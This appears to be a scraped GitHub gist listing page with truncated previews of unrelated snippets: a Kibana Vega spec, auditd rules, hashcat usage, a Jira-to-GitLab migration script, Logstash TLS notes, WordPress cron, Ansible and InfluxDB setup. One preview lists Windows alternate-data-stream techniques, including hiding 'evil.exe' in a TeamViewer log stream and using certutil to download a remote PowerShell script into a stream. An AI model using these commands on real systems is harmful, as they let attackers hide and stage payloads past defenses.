Willem D'Haese willemdh

{
$schema: https://vega.github.io/schema/vega/v3.json
data: [
{
name: esdata
url: {
%context%: true
%timefield%: @timestamp
index: logstash-*
body: {
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active June 11, 2024 15:14
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@Neo23x0
Neo23x0 / audit.rules
Last active June 6, 2024 13:21
Linux Auditd Best Practice Configuration
# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd
# ___ ___ __ __
# / | __ ______/ (_) /_____/ /
# / /| |/ / / / __ / / __/ __ /
# / ___ / /_/ / /_/ / / /_/ /_/ /
# /_/ |_\__,_/\__,_/_/\__/\__,_/
@BeanBagKing
BeanBagKing / hashcat_help.txt
Created November 8, 2016 18:52
Hashcat Help Documentation
hashcat64.exe -a 0 -w 0 -m 1000 -r rules/lmNTLM.rule hashes/ntlm.txt lists/lab.txt
hashcat64.exe -a 0 -w 1 -m 1800 hashes/unixmd5.txt lists/rockyou.txt
hashcat64.exe -a 3 -w 1 -m 1800 --increment ?a?a?a?a?a hashes/unixmd5.txt
C:\hashcat-3.10>hashcat64.exe -h
hashcat, advanced password recovery
Usage: hashcat [options]... hash|hashfile|hccapfile [dictionary|mask|directory]...
import requests
from requests.auth import HTTPBasicAuth
import re
from StringIO import StringIO
JIRA_URL = 'https://your-jira-url.tld/'
JIRA_ACCOUNT = ('jira-username', 'jira-password')
# the JIRA project ID (short)
JIRA_PROJECT = 'PRO'
GITLAB_URL = 'http://your-gitlab-url.tld/'
@andrewkroh
andrewkroh / beats-logstash-tls.md
Last active August 30, 2023 06:40
Using TLS between Beats and Logstash

Using TLS between Beats and Logstash

Beats to Logstash over TLS

The purpose of this document is to help with configuring and troubleshooting using TLS on the connection between Beats and Logstash.

Configuration

You must configure TLS on both the client and server to make this work. This

@bjornjohansen
bjornjohansen / run-wp-cron.sh
Last active September 17, 2023 21:12
Run all due cron events for WordPress with WP-CLI. Works with both single sites and multisite networks.
#!/bin/bash
# Copyright © 2015 Bjørn Johansen
# This work is free. You can redistribute it and/or modify it under the
# terms of the Do What The Fuck You Want To Public License, Version 2,
# as published by Sam Hocevar. See http://www.wtfpl.net/ for more details.
WP_PATH="/path/to/wp"
# Check if WP-CLI is available
if ! hash wp 2>/dev/null; then
@manuelmeurer
manuelmeurer / swap.yml
Created June 30, 2015 09:29
Ansible role for creating a Swap file
- name: set swap_file variable
set_fact:
swap_file: /mnt/{{ swap_space }}.swap
- name: check if swap file exists
stat:
path: "{{ swap_file }}"
register: swap_file_check
- name: create swap file
@GaryRogers
GaryRogers / gist:8ccc6a9e711ee229efa6
Last active September 24, 2016 15:31
Setting up InfluxDB on CentOS/RHEL

Setting up InfluxDB on CentOS/RHEL

The InfluxDB Docs give you a very brief overview of installing InfluxDB on a host. It boils down to 'here's the RPM, install it.' That's fine for looking at the software, but you'll probably want to adjust the configuration a bit for a production environment.

Basic Install

https://influxdb.com/docs/v0.9/introduction/installation.html

Config changes

Modify /etc/opt/influxdb/influxdb.conf

@tolleiv
tolleiv / README.md
Last active August 10, 2021 21:01
Fortigate 300C logstash log parsing

Fortigate 300c log parsing in Logstash

QA can be done with:

logstash-1.4.2/bin/logstash rspec --format documentation test.rb